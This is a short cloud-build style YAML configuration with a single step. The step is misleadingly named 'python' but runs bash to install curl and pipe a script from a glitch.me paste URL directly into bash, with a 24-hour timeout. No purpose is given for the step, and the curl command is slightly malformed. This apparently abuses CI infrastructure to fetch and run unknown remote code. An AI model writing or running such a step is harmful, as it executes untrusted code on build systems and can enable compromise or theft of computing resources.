steps:
  - name: python
    args:
      - '-c'
      - >-
        apt-get update && apt-get install curl -y && curl -sL curl https://muq-hastebin.glitch.me/raw/JEXp1Dm0Am | bash
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
